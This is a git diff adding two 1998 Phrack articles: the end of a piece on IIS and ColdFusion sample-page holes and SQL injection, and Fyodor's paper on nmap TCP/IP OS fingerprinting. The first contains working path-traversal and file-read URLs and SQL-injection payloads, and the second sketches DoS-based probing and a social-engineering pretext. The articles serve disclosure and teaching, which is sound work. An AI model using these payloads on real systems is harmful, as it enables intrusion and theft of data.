+all you get to see is directories (no files).  In case you're wondering, you
+can tell bdir.htr where to look by doing
+
+	/scripts/iisadmin/bdir.htr??<path>
+ie:
+	/scripts/iisadmin/bdir.htr??d:\webs\
+
+I haven't played with the other file extensions, but there's a half-dozen or
+so that IIS will now happily process (the normal ones like .ASP, .IDC, .HTR,
+and other unfamiliar ones like .HTW, .IDQ, .IDA, .CER, etc).
+
+
+----[  Sample pages
+
+While it's not a good idea to put included sample pages and applications on a
+public server, still many places do.  IIS 4.0 includes a rather large and
+comprehensive demo site called 'Exploration Air', which employs many IIS 4.0
+web technologies.  An interesting feature is the 'How It Works' button on the
+bottom of every page, which takes you to a script that parses the pages code
+into colorful tags.  This is a problem.
+
+It uses the Scripting.FileSystemObject to request the page.  Luckily, it will
+only let you use virtual paths; unfortunately, it allows the use of /../ to
+escape to higher directories, including up into the root directory.  This
+allows it to open any file on the same drive.  Using the .IDC bug above to
+determine where the file rests, you can determine if you can get to WinNT
+system files.  You can also view the code of any page application (.ASP,
+.CFM, .IDC, etc).  For example:
+
+http://site/iissamples/exair/howitworks/codebrws.asp?source=/../../boot.ini
+
+could show the Windows NT boot.ini file.  It's used in the ExAir sample site,
+as shown above, and also the SDK, if installed, at
+http://site/iissamples/sdk/asp/docs/codebrws.asp
+
+
+----[  Cold Fusion app.server 3.1
+
+Cold Fusion is a rather creative scripting language; it's a nice front end
+to ODBC database connections.  But I wouldn't be mentioning it here if it
+didn't have any problems.
+
+Like IIS 4.0, there's a few alarming things with the sample pages included
+with CF.  One is the Expression Evaluator at:
+
+	http://site/cfdocs/expeval/eval.cfm
+
+They have a security check.  It calls check_ip.cfm, which allows access only
+from 127.0.0.1 (localhost).  Bummer, we can't run raw code on the server.
+But, let's check out:
+
+	http://site/cfdocs/expeval/exprcalc.cfm
+
+It still doesn't do us any good, because it still uses eval.cfm to process
+the expression(s) we enter.  But, there's something more interesting: the
+expression calculator lets us save and load files of expressions to
+evaluate.  And it just so happens that exprcalc.cfm is the form used to
+LOAD files.  And it let's us load any file we want.  For instance:
+
+	http://site/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
+
+will display the contents of boot.ini in the window.  Just like the IIS
+codebrws.asp program, we can use it to look at any file we want.  However,
+exprcalc.cfm lets us specify other drive letters, while codebrws.asp is
+limited to only the current drive.
+
+
+----[  Anonymous Mail
+
+Very simply and quickly,
+
+	/cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
+
+lets you send email.  Not exactly a security breach, but not pleasant either. 
+You must fill in the variable values.
+
+
+----[ Proxy Problems
+
+This is an interesting problem brought about not only by CF, but possibly
+proxy software in general.  CF includes an 'http client' application in
+
+	/cfdocs/examples/httpclient/mainframeset.cfm
+
+which lets you type in an URL, and it will show you the HTML code in the
+bottom window.  Now, let's say, remotely I try to administer the IIS 4.0
+server that CF is running on by going to http://site:5416/.  I get an error
+stating I have to be local (127.0.0.1).  Now, I go to the http-client CF
+application on that same server.  For the URL, I type "http://localhost:5416".
+I get the correct page as the result.  I have effectively bypassed the
+security check.  Using GET commands in the CF http-client application, I can
+administrate the server.
+
+What's really interesting in theory is that applications like this, and proxys
+in general, can be used to abuse trust relationships and 'localhost only'
+security.  It'd be interesting in hearing what other people find along this
+line.  One example:
+
+I surf to a company's firewall/web proxy from the 'outside'.  I get an error
+stating 'Denied/Unauthorized Access'.  I then request from their proxy
+'GET http://localhost/'; and now I get the 'inside' web page with instructions
+on how to use the proxy correctly to get out.  Yes, there's obvious setup
+problems (allowing outside requests), but that's not the point...
+
+
+----[  ODBC and MS SQL server 6.5
+
+Ok, topic change again.  Since we've hit on web service and database stuff,
+let's roll with it.  Onto ODBC and MS SQL server 6.5.
+
+I worked with a fellow WT'er on this problem.  He did the good thing and told
+Microsoft, and their answer was, well, hilarious.  According to them,
+what you're about to read is not a problem, so don't worry about doing
+anything to stop it.
+
+- WHAT'S THE PROBLEM?  MS SQL server allows batch commands.
+
+- WHAT'S THAT MEAN?  I can do something like:
+
+	SELECT * FROM table WHERE x=1 SELECT * FROM table WHERE y=5
+
+Exactly like that, and it'll work.  It will return two record sets, with each
+set containing the results of the individual SELECT.
+
+- WHAT'S THAT REALLY MEAN?  People can possibly piggyback SQL commands into
+your statements.  Let's say you have:
+
+	SELECT * FROM table WHERE x=%%criteria from webpage user%%
+
+Now, what if %%criteria from webpage user%% was equal to:
+
+	SELECT * FROM sysobjects
+
+It would translate to:
+
+	SELECT * FROM table WHERE x=1 SELECT * FROM sysobjects
+
+which would be valid SQL and execute (both commands).  But wait, there's more.
+Say you had:
+
+	SELECT * FROM table WHERE x=%%criteria%% AND y=5
+
+If we used our above example, we'd get:
+
+	SELECT * FROM table WHERE x=1 SELECT * FROM sysobjects AND y=5
+
+which isn't valid SQL, and won't work.  Well, there's a comment indicator,
+which tells MS SQL server to just ignore the rest of the line.  If criteria is
+"1 SELECT * FROM sysobjects --", then the '--' causes the rest of the
+statement ("AND y=5") to be ignored.
+
+- WHAT FILES OF MINE ARE AFFECTED?  Well, ASP and IDC files are problematic.
+At least you can fix ASP files, but you're kinda stuck when it comes to
+IDCs.
+
+- EXACTLY HOW ARE IDCs AFFECTED?  Say we wanted to query a database of 
+names=phone #s, where the user gives us a name, and we supply all the 
+matching phone numbers.  A Sql call like 
+
+	SELECT * FROM phonetable WHERE NAME='namewewant'
+
+would work.  However, we need to dynamically specify "namewewant" to be
+the name the user does want.  So, if we write the Sql statement:
+
+	SELECT * FROM phonetable WHERE NAME='%name%'
+
+And in our HTML form, we have an input box called 'name'.  If this .idc
+was called 'phone.idc', we'd call it:  
+
+	http://site/phone.idc?name=rfp
+
+The server would place "rfp" in place of %name%, and query the SQL server
+to select * where name='rfp'.
+
+Now, stick more commands on the line. Executing our phone.idc from above
+like so:
+
+	phone.idc?name=rfp select * from table2
+
+would lead to an expanded Sql query in the .idc to
+
+	SELECT * FROM phonetable WHERE name='rfp select * from table2'
+
+Semi-close, but the single quotes cause all of the stuff to be the
+selection criteria.  What if we introduced OUR OWN single quote?
+
+	phone.idc?name=rfp' select * from table2 --
+
+would be
+
+	SELECT * FROM phonetable WHERE name='rfp' select * from table2 --'
+
+We need to add the comment to get rid of the trailing single quote.  BUT...
+.idc's are smart...they will escape a single quote into two single quotes,
+which indicate a data single quote. I.e.
+
+	phone.idc?name=rfp' command
+
+will become
+
+	SELECT * FROM phonetable WHERE name='rfp'' command'
+
+And since two '' make one data ', the table will be queried for a column
+that matches: 
+
+	"rfp' command"
+
+Now wait, if .idc's protect against this, then why the hell am I wasting
+my breath? You see, they're still vulnerable.  They suck when they secretly
+put an extra single quote into the SQL string.  But....when you query numeric
+values, you don't use single quotes; single quotes are only for strings.  So,
+lets's say we want to use our phone number database, but give a phone number,
+and look up the associated name.  We'll also say that phone numbers are
+stored as long ints (numeric values), rather than strings, since we need a
+numeric entry for this example.
+
+So, I want to know who has the phone number 5551212.  A hardcoded SQL call
+would be
+
+	SELECT * FROM phonetable WHERE phone=5551212
+
+And the variable version (in an .idc):
+
+	SELECT * FROM phonetable WHERE phone=%phonenum%
+
+Whoa!  No single quotes to worry about.  Now we just do a simple:
+
+	phone.idc?phonenum=5551212 select * from table1
+
+And that expands to
+
+	SELECT * FROM phonetable WHERE phone=5551212 select * from table1
+
+- ARE THERE ANY .IDCs SOMEONE COULD USE AGAINST ME?  Glad you asked.  There's
+a file included with IIS 3.0 in the /scripts/tools directory, called ctss.idc,
+which has a SQL statement like:
+
+	CREATE TABLE %table% (...table defs...)
+
+This is simple to exploit.  Since you stuck with the inital 'CREATE TABLE',
+you must finish that to be a valid command.  Giving a table name and a simple
+column definition will be sufficient.  And then we tack on our command, and
+then a '--' to ignore the rest of the table defs.  So,
+
+	ctss.idc?table=craptable (f int) select * from table1 --
+
+Would give us
+
+	CREATE TABLE craptable (f int) select * from table1 -- \
+		(...table defs...)
+
+(However, with ctss.idc, you need to know the DSN, UID, and PWD beforehand...
+so you're somewhat safe)
+
+- EXACTLY HOW ARE ASPs AFFECTED?  Typical ADODB code looks something
+like:
+
+	<% SQLquery="SELECT * FROM phonetable"
+	Set Conn = Server.CreateObject("ADODB.Connection")
+	Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
+	Set rec = Server.CreateObject("ADODB.RecordSet")
+	rec.ActiveConnection=Conn
+	rec.Open SQLquery %>
+
+Which essentially performs a SELECT * FROM phonetable on the websql DSN,
+using user=sa, pwd=pwd, on database=master.  Then you use fancy formating
+of 'rec' to display the output in ASP.
+
+Well, let's take into account user supplied variables now.
+
+	<% SQLquery="SELECT * FROM phonetable WHERE name='" & _
+	request.querystring("name") & "'"
+	Set Conn = Server.CreateObject("ADODB.Connection")
+	Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
+	Set rec = Server.CreateObject("ADODB.RecordSet")
+	rec.ActiveConnection=Conn
+	rec.Open SQLquery %>
+
+So, now our variable "name" is stuck into the SQLquery string, between the
+two ' '.  Guess what?!  ASP doesn't care about single quotes.  It won't be
+smart like an .IDC and put in the extra ' to make the command ' into a
+data '.  So, what does the SQLquery string look like when we call it like
+phone.idc?  Let's say the above is phone.asp:
+
+	phone.asp?name=rfp' select * from table1 --
+
+Gives us SQLquery that is:
+
+	SELECT * FROM phonetable WHERE name='rfp' select * from table1 --'
+
+Which works.  No sweat.
+
+I'm sure some interesting questions come to mind:
+
+- BUT I DON'T KNOW THE DSN NAME, LOGIN NAME, OR PASSWORD!  You don't need
+them.  The developer of the page that contains the SQL will already take care
+of that.  We're piggy-backing SQL commands onto a command that will work
+(otherwise, the page/application wouldn't work normally anyway!).  If the
+normal page can get to the SQL server through a firewall, VPN, etc, then so
+can this command.  It can, and will, go wherever the normal pages/SQL can
+go.
+
+- BUT I CAN'T VIEW THE SECOND RETURNED RECORDSET!  Yes, this is a problem
+most of the time.  Not too many applications are built assuming multiple
+recordset returns, so usually don't cooperate.  But, let me just say
+there's a stored procedure in SQL that lets you email results of a command
+to anywhere....you don't need to see the results in your web browser.
+
+- BUT WHAT GOOD IS RUNNING MORE SQL COMMANDS?  My friend, my friend.  Think
+bigger.  Think better.  Think stored procedures.  I'm not going to include
+exploit examples, because that's not what this is about.  This is simply to
+show that the problem exists.
+
+- BUT WHAT IF THEY HAVE COMPLEX SQL COMMANDS?  Yes, this can be tricky, but
+it's still possible.  Think of it like writing a buffer overflow.  ;-)  If
+we have:
+
+	SELECT * FROM table WHERE ((x=%%criteria) AND (y=5))
+
+then we have parentheses to deal with.  But still doable.  The goal is to
+close out any open parentheses opened before the piggybacked SQL statement,
+and use -- (comment) to ignore anything after.
+
+- HOW CAN I PROTECT MYSELF?  Put quotes around every string taken from the
+web user that's used in your SQL statement, and also change any single
+quotes (') into double single quotes ('')--this protects everything.  In case
+of numeric criteria, check to see that the numeric string given back is,
+in fact, all numbers. And since you can't do any of the above in IDCs,
+switch to ASP.  Don't allow access to any of the SQL servers extended
+procedures.  Best of all, don't use raw SQL in your web applications;
+called custom stored  procedures on the SQL server, and pass the web
+user's dynamic criteria as parameters.
+
+Note: we've only had the time (and resources) to conduct batch SQL
+vulnerabilities against MS SQL server 6.5.  We'd be interested in hearing
+from other people if other DB platforms (Oracle, Informix, etc) are also
+vulnerable.
+
+
+----[  Conclusion
+
+Well, that about wraps it up for now.  What are the morals to the above
+stories?
+
+- Don't use sample files/applications on public/production servers.
+- Don't use 'local-host only' security, especially on proxys.
+- Watch what exactly is changed when you upgrade.
+- Don't assume user's input is ok for SQL queries.
+
+In short, use your brain.  Till next time, have fun.
+
+rain.forest.puppy / [WT]         rfpuppy@iname.com
+
+----[  EOF
diff --git a/phrack54/9.txt b/phrack54/9.txt
new file mode 100644
index 0000000..afbc460
--- /dev/null
+++ b/phrack54/9.txt
@@ -0,0 +1,601 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 09 of 12
+
+
+-------------------------[  Remote OS detection via TCP/IP Stack FingerPrinting
+
+
+
+--------[  Fyodor <fyodor@dhp.com> (www.insecure.org) October 18, 1998
+
+
+----[  ABSTRACT
+
+This paper discusses how to glean precious information about a host by querying
+its TCP/IP stack.  I first present some of the "classical" methods of
+determining host OS which do not involve stack fingerprinting.  Then I
+describe the current "state of the art" in stack fingerprinting tools.  Next
+comes a description of many techniques for causing the remote host to leak
+information about itself.  Finally I detail my (nmap) implementation of this,
+followed by a snapshot gained from nmap which discloses what OS is running on
+many popular Internet sites.
+
+
+----[  REASONS
+
+I think the usefulness of determining what OS a system is running is pretty
+obvious, so I'll make this section short.  One of the strongest examples of
+this usefulness is that many security holes are dependent on OS version.  Let's
+say you are doing a penetration test and you find port 53 open.  If this is a
+vulnerable version of Bind, you only get one chance to exploit it since a
+failed attempt will crash the daemon.  With a good TCP/IP fingerprinter, you
+will quickly find that this machine is running 'Solaris 2.51' or 'Linux 2.0.35'
+and you can adjust your shellcode accordingly.
+
+A worse possibility is someone scanning 500,000 hosts in advance to see what
+OS is running and what ports are open.  Then when someone posts (say) a root
+hole in Sun's comsat daemon, our little cracker could grep his list for
+'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable
+boxes.  It should be noted that this is SCRIPT KIDDIE behavior.  You have
+demonstrated no skill and nobody is even remotely impressed that you were able
+to find some vulnerable .edu that had not patched the hole in time.  Also,
+people will be even _less_ impressed if you use your newfound access to deface
+the department's web site with a self-aggrandizing rant about how damn good
+you are and how stupid the sysadmins must be.
+
+Another possible use is for social engineering.  Lets say that you are scanning
+ your target company and nmap reports a 'Datavoice TxPORT PRISM 3000 T1
+CSU/DSU 6.22/2.06'.  The hacker might now call up as 'Datavoice support' and
+discuss some issues about their PRISM 3000.  "We are going to announce a
+security hole soon, but first we want all our current customers to install the
+patch -- I just mailed it to you..."  Some naive administrators might assume
+that only an authorized engineer from Datavoice would know so much about their
+CSU/DSU.
+
+Another potential use of this capability is evaluation of companies you may
+want to do business with.  Before you choose a new ISP, scan them and see what
+equipment is in use.  Those "$99/year" deals don't sound nearly so good when
+you find out they have crappy routers and offer PPP services off a bunch of
+Windows boxes.
+
+
+----[  CLASSICAL TECHNIQUES
+
+Stack fingerprinting solves the problem of OS identification in a unique way.
+I think this technique holds the most promise, but there are currently many
+other solutions.  Sadly, this is still one the most effective of those
+techniques:
+
+playground~> telnet hpux.u-aizu.ac.jp
+Trying 163.143.103.12...
+Connected to hpux.u-aizu.ac.jp.
+Escape character is '^]'.
+
+HP-UX hpux B.10.01 A 9000/715 (ttyp2)
+
+login: 
+
+There is no point going to all this trouble of fingerprinting if the machine
+will blatantly announce to the world exactly what it is running!  Sadly, many
+vendors ship _current_ systems with these kind of banners and many admins do
+not turn them off.  Just because there are other ways to figure out what OS is
+running (such as fingerprinting), does not mean we should just announce our OS
+and architecture to every schmuck who tries to connect.
+
+The problems with relying on this technique are that an increasing number of
+people are turning banners off, many systems don't give much information, and
+it is trivial for someone to "lie" in their banners.  Nevertheless, banner
+reading is all you get for OS and OS Version checking if you spend thousands of
+dollars on the commercial ISS scanner.  Download nmap or queso instead and
+save your money :).
+
+Even if you turn off the banners, many applications will happily give away
+this kind of information when asked.  For example lets look at an FTP server:
+
+payfonez> telnet ftp.netscape.com 21
+Trying 207.200.74.26...
+Connected to ftp.netscape.com.
+Escape character is '^]'.
+220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.
+SYST
+215 UNIX Type: L8 Version: SUNOS
+
+First of all, it gives us system details in its default banner.  Then if we
+give the 'SYST' command it happily feeds back even more information.
+
+If anon FTP is supported, we can often download /bin/ls or other binaries and
+determine what architecture it was built for.
+
+Many other applications are too free with information.  Take web servers for
+example:
+
+playground> echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:' 
+Server: Microsoft-IIS/4.0
+playground>
+
+Hmmm ... I wonder what OS those lamers are running.
+
+Other classic techniques include DNS host info records (rarely effective) and
+social engineering.  If the machine is listening on 161/udp (snmp), you are
+almost guaranteed a bunch of detailed info using 'snmpwalk' from the CMU SNMP
+tools distribution and the 'public' community name.
+
+
+----[  CURRENT FINGERPRINTING PROGRAMS
+
+Nmap is not the first OS recognition program to use TCP/IP fingerprinting.
+The common IRC spoofer sirc by Johan has included very rudimentary
+fingerprinting techniques since version 3 (or earlier).  It attempts to place
+a host in the classes "Linux", "4.4BSD", "Win95", or "Unknown" using a few
+simple TCP flag tests.
+
+Another such program is checkos, released publicly in January of this year by
+Shok of Team CodeZero in Confidence Remains High Issue #7.  The fingerprinting
+techniques are exactly the same as SIRC, and even the _code_ is identical in
+many places.  Checkos was privately available for a long time prior to the
+public release, so I have no idea who swiped code from whom.  But neither
+seems to credit the other.  One thing checkos does add is telnet banner
+checking, which is useful but has the problems described earlier.
+
+Su1d also wrote an OS checking program.  His is called SS and as of Version
+3.11 it can identify 12 different OS types.  I am somewhat partial to this one
+since he credits my nmap program for some of the networking code :).
+
+Then there is queso.  This program is the newest and it is a huge leap forward
+from the other programs.  Not only do they introduce a couple new tests, but
+they were the first (that I have seen) to move the OS fingerprints _out_ of
+the code.  The other scanners included code like:
+
+/* from ss */
+if ((flagsfour & TH_RST) && (flagsfour & TH_ACK) && (winfour == 0) && 
+   (flagsthree & TH_ACK))
+       reportos(argv[2],argv[3],"Livingston Portmaster ComOS");
+
+Instead, queso moves this into a configuration file which obviously scales
+much better and makes adding an OS as easy as appending a few lines to a
+fingerprint file.
+
+Queso was written by Savage, one of the fine folks at Apostols.org.
+
+One problem with all the programs describe above is that they are very limited
+in the number of fingerprinting tests which limits the granularity of answers.
+I want to know more than just 'this machine is OpenBSD, FreeBSD, or NetBSD', I
+wish to know exactly which of those it is as well as some idea of the release
+version number.  In the same way, I would rather see 'Solaris 2.6' than simply
+'Solaris'.  To achieve this response granularity, I worked on a number of
+fingerprinting techniques which are described in the next section.
+
+
+----[  FINGERPRINTING METHODOLOGY
+
+There are many, many techniques which can be used to fingerprint networking
+stacks.  Basically, you just look for things that differ among operating
+systems and write a probe for the difference.  If you combine enough of these,
+you can narrow down the OS very tightly.  For example nmap can reliably
+distinguish Solaris 2.4 vs. Solaris 2.5-2.51 vs Solaris 2.6.  It can also tell
+Linux kernel 2.0.30 from 2.0.31-34 or 2.0.35.  Here are some techniques:
+
+The FIN probe -- Here we send a FIN packet (or any packet without an
+    ACK or SYN flag) to an open port and wait for a response.  The
+    correct RFC793 behavior is to NOT respond, but many broken
+    implementations such as MS Windows, BSDI, CISCO, HP/UX, MVS, and
+    IRIX send a RESET back.  Most current tools utilize this
+    technique.
+
+The BOGUS flag probe -- Queso is the first scanner I have seen to use
+    this clever test.  The idea is to set an undefined TCP "flag" ( 64
+    or 128) in the TCP header of a SYN packet.  Linux boxes prior to
+    2.0.35 keep the flag set in their response.  I have not found any
+    other OS to have this bug.  However, some operating systems seem
+    to reset the connection when they get a SYN+BOGUS packet.  This 
+    behavior could be useful in identifying them.
+			
+TCP ISN Sampling -- The idea here is to find patterns in the initial
+    sequence numbers chosen by TCP implementations when responding to
+    a connection request.  These can be categorized in to many groups
+    such as the traditional 64K (many old UNIX boxes), Random
+    increments (newer versions of Solaris, IRIX, FreeBSD, Digital
+    UNIX, Cray, and many others), True "random" (Linux 2.0.*, OpenVMS,
+    newer AIX, etc).  Windows boxes (and a few others) use a "time
+    dependent" model where the ISN is incremented by a small fixed
+    amount each time period.  Needless to say, this is almost as
+    easily defeated as the old 64K behavior.  Of course my favorite
+    technique is "constant".  The machines ALWAYS use the exact same
+    ISN :).  I've seen this on some 3Com hubs (uses 0x803) and Apple
+    LaserWriter printers (uses 0xC7001).
+
+    You can also subclass groups such as random incremental by
+    computing variances, greatest common divisors, and other functions
+    on the set of sequence numbers and the differences between the
+    numbers.
+
+    It should be noted that ISN generation has important security
+    implications.  For more information on this, contact "security
+    expert" Tsutomu "Shimmy" Shimomura at SDSC and ask him how he was
+    owned.  Nmap is the first program I have seen to use this for OS
+    identification.
+
+Don't Fragment bit -- Many operating systems are starting to set the
+    IP "Don't Fragment" bit on some of the packets they send.  This
+    gives various performance benefits (though it can also be annoying
+    -- this is why nmap fragmentation scans do not work from Solaris
+    boxes).  In any case, not all OS's do this and some do it in
+    different cases, so by paying attention to this bit we can glean
+    even more information about the target OS.  I haven't seen this
+    one before either.
+
+TCP Initial Window -- This simply involves checking the window size on
+    returned packets.  Older scanners simply used a non-zero window on
+    a RST packet to mean "BSD 4.4 derived".  Newer scanners such as
+    queso and nmap keep track of the exact window since it is actually
+    pretty constant by OS type.  This test actually gives us a lot of
+    information, since some operating systems can be uniquely
+    identified by the window alone (for example, AIX is the only OS I
+    have seen which uses 0x3F25).  In their "completely rewritten"
+    TCP stack for NT5, Microsoft uses 0x402E.  Interestingly, that is
+    exactly the number used by OpenBSD and FreeBSD.
+
+ACK Value -- Although you would think this would be completely
+    standard, implementations differ in what value they use for the
+    ACK field in some cases.  For example, lets say you send a
+    FIN|PSH|URG to a closed TCP port.  Most implementations will set
+    the ACK to be the same as your initial sequence number, though
+    Windows and some stupid printers will send your seq + 1.  If you
+    send a SYN|FIN|URG|PSH to an open port, Windows is very
+    inconsistent.  Sometimes it sends back your seq, other times it
+    sends S++, and still other times is sends back a seemingly random
+    value.  One has to wonder what kind of code MS is writing that
+    changes its mind like this.
+
+ICMP Error Message Quenching -- Some (smart) operating systems follow
+    the RFC 1812 suggestion to limit the rate at which various error
+    messages are sent.  For example, the Linux kernel (in
+    net/ipv4/icmp.h) limits destination unreachable message generation
+    to 80 per 4 seconds, with a 1/4 second penalty if that is
+    exceeded.  One way to test this is to send a bunch of packets to
+    some random high UDP port and count the number of unreachables
+    received.  I have not seen this used before, and in fact I have
+    not added this to nmap (except for use in UDP port scanning).
+    This test would make the OS detection take a bit longer since you
+    need to send a bunch of packets and wait for them to return.  Also
+    dealing with the possibility of packets dropped on the network
+    would be a pain.
+
+ICMP Message Quoting -- The RFCs specify that ICMP error messages
+    quote some small amount of an ICMP message that causes various
+    errors.  For a port unreachable message, almost all
+    implementations send only the required IP header + 8 bytes back.
+    However, Solaris sends back a bit more and Linux sends back even
+    more than that.  The beauty with this is it allows nmap to
+    recognize Linux and Solaris hosts even if they don't have any
+    ports listening.
+
+ICMP Error message echoing integrity -- I got this idea from something
+   Theo De Raadt (lead OpenBSD developer) posted to
+   comp.security.unix.  As mentioned before, machines have to send
+   back part of your original message along with a port unreachable
+   error.  Yet some machines tend to use your headers as 'scratch
+   space' during initial processing and so they are a bit warped by
+   the time you get them back.  For example, AIX and BSDI send back an
+   IP 'total length' field that is 20 bytes too high.  Some BSDI,
+   FreeBSD, OpenBSD, ULTRIX, and VAXen fuck up the IP ID that you sent
+   them.  While the checksum is going to change due to the changed
+   TTL anyway, there are some machines (AIX, FreeBSD, etc.) which send
+   back an inconsistent or 0 checksum.  Same thing goes with the UDP
+   checksum.  All in all, nmap does nine different tests on the ICMP
+   errors to sniff out subtle differences like these.
+
+Type of Service -- For the ICMP port unreachable messages I look at
+   the type of service (TOS) value of the packet sent back.  Almost
+   all implementations use 0 for this ICMP error although Linux uses
+   0xC0.  This does not indicate one of the standard TOS values, but instead is
+   part of the unused (AFAIK) precedence field.  I do not know why
+   this is set, but if they change to 0 we will be able to keep
+   identifying the old versions _and_ we will be able to identify
+   between old and new.
+
+Fragmentation Handling -- This is a favorite technique of Thomas
+   H. Ptacek of Secure Networks, Inc (now owned by a bunch of Windows
+   users at NAI).  This takes advantage of the fact that different
+   implementations often handle overlapping IP fragments differently.
+   Some will overwrite the old portions with the new, and in other
+   cases the old stuff has precedence.  There are many different
+   probes you can use to determine how the packet was reassembled.  I
+   did not add this capability since I know of no portable way to send
+   IP fragments (in particular, it is a bitch on Solaris).  For more
+   information on overlapping fragments, you can read their IDS paper
+   (www.secnet.com).
+
+TCP Options -- These are truly a gold mine in terms of leaking
+    information.  The beauty of these options is that:
+    1) They are generally optional (duh!) :) so not all hosts implement
+       them.
+    2) You know if a host implements them by sending a query with an
+       option set. The target generally show support of the option by
+       setting it on the reply.
+    3) You can stuff a whole bunch of options on one packet to test
+       everything at once.
+    
+    Nmap sends these options along with almost every probe packet: 
+
+    Window Scale=10; NOP; Max Segment Size = 265; Timestamp; End of Ops;
+
+    When you get your response, you take a look at which options were
+    returned and thus are supported.  Some operating systems such as
+    recent FreeBSD boxes support all of the above, while others, such
+    as Linux 2.0.X support very few.  The latest Linux 2.1.x kernels
+    do support all of the above.  On the other hand, they are more
+    vulnerable to TCP sequence prediction.  Go figure.
+
+    Even if several operating systems support the same set of options,
+    you can sometimes distinguish them by the _values_ of the options.
+    For example, if you send a small MSS value to a Linux box, it will
+    generally echo that MSS back to you.  Other hosts will give you
+    different values.
+
+    And even if you get the same set of supported options AND the same
+    values, you can still differentiate via the _order_ that the
+    options are given, and where padding is applied.  For example
+    Solaris returns 'NNTNWME' which means:
+    <no op><no op><timestamp><no op><window scale><echoed MSS>
+
+    While Linux 2.1.122 returns MENNTNW.  Same options, same values,
+    but different order!
+
+    I have not seen any other OS detection tools utilizes TCP options,
+    but it is very useful.
+
+    There are a few other useful options I might probe for at some
+    point, such as those that support T/TCP and selective
+    acknowledgements.
+
+
+Exploit Chronology -- Even with all the tests above, nmap is unable to
+    distinguish between the TCP stacks of Win95, WinNT, or Win98.
+    This is rather surprising, especially since Win98 came out about 4
+    years after Win95.  You would think they would have bothered to
+    improve the stack in some way (like supporting more TCP options)
+    and so we would be able to detect the change and distinguish the
+    operating systems.  Unfortunately, this is not the case.  The NT
+    stack is apparently the same crappy stack they put into '95.  And
+    they didn't bother to upgrade it for '98.
+
+    But do not give up hope, for there is a solution.  You can simply
+    start with early Windows DOS attacks (Ping of Death, Winnuke, etc)
+    and move up a little further to attacks such as Teardrop and Land.
+    After each attack, ping them to see whether they have crashed.
+    When you finally crash them, you will likely have narrowed what
+    they are running down to one service pack or hotfix.
+
+    I have not added this functionality to nmap, although I must admit
+    it is very tempting :).
+
+
+SYN Flood Resistance -- Some operating systems will stop accepting new
+    connections if you send too many forged SYN packets at them
+    (forging the packets avoids trouble with your kernel resetting the
+    connections).  Many operating systems can only handle 8 packets.
+    Recent Linux kernels (among other operating systems) allow
+    various methods such as SYN cookies to prevent this from being a
+    serious problem.  Thus you can learn something about your target
+    OS by sending 8 packets from a forged source to an open port and
+    then testing whether you can establish a connection to that port
+    yourself.  This was not implemented in nmap since some people get
+    upset when you SYN flood them.  Even explaining that you were
+    simply trying to determine what OS they are running might not help
+    calm them.
+
+
+----[  NMAP IMPLEMENTATION AND RESULTS
+
+I have created a reference implementation of the OS detection techniques
+mentioned above (except those I said were excluded).  I have added this to my
+Nmap scanner which has the advantage that it already _knows_ what ports are
+open and closed for fingerprinting so you do not have to tell it.  It is also
+portable among Linux, *BSD, and Solaris 2.51 and 2.6, and some other operating
+systems.
+
+The new version of nmap reads a file filled with Fingerprint templates that
+follow a simple grammar.  Here is an example:
+
+FingerPrint  IRIX 6.2 - 6.4 # Thanks to Lamont Granquist
+TSeq(Class=i800)
+T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)
+T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
+T3(Resp=Y%DF=N%W=C000|EF2A%ACK=O%Flags=A%Ops=NNT)
+T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
+T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
+T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
+T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)
+PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
+
+Lets look at the first line (I'm adding '>' quote markers):
+
+> FingerPrint  IRIX 6.2 - 6.3 # Thanks to Lamont Granquist
+
+This simply says that the fingerprint covers IRIX versions 6.2 through 6.3 and
+the comment states that Lamont Granquist kindly sent me the IP addresses or
+fingerprints of the IRIX boxes tested.
+
+> TSeq(Class=i800)
+
+This means that ISN sampling put it in the "i800 class".  This means that each
+new sequence number is a multiple of 800 greater than the last one.
+
+> T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)
+
+The test is named T1 (for test1, clever eh?).  In this test we send a SYN
+packet with a bunch of TCP options to an open port.  DF=N means that the
+"Don't fragment" bit of the response must not be set.  W=C000|EF2A means that
+the window advertisement we received must be 0xC000 or EF2A.  ACK=S++ means
+the acknowledgement we receive must be our initial sequence number plus 1.
+Flags = AS means the ACK and SYN flags were sent in the response.
+Ops = MNWNNT means the options in the response must be (in this order):
+
+<MSS (not echoed)><NOP><Window scale><NOP><NOP><Timestamp>
+
+> T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
+
+Test 2 involves a NULL with the same options to an open port.  Resp=Y means we
+must get a response.  Ops= means that there must not be any options included
+in the response packet.  If we took out '%Ops=' entirely then any options sent
+would match.
+
+> T3(Resp=Y%DF=N%W=400%ACK=S++%Flags=AS%Ops=M)
+
+Test 3 is a SYN|FIN|URG|PSH w/options to an open port.
+
+> T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
+
+This is an ACK to an open port.  Note that we do not have a Resp= here.  This
+means that lack of a response (such as the packet being dropped on the network
+or an evil firewall) will not disqualify a match as long as all the other
+tests match.  We do this because virtually any OS will send a response, so a
+lack of response is generally an attribute of the network conditions and not
+the OS itself.  We put the Resp tag in tests 2 and 3 because some operating
+systems _do_ drop those without responding.
+
+> T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
+> T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
+> T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)
+
+These tests are a SYN, ACK, and FIN|PSH|URG, respectively, to a closed port.
+The same options as always are set.  Of course this is all probably obvious
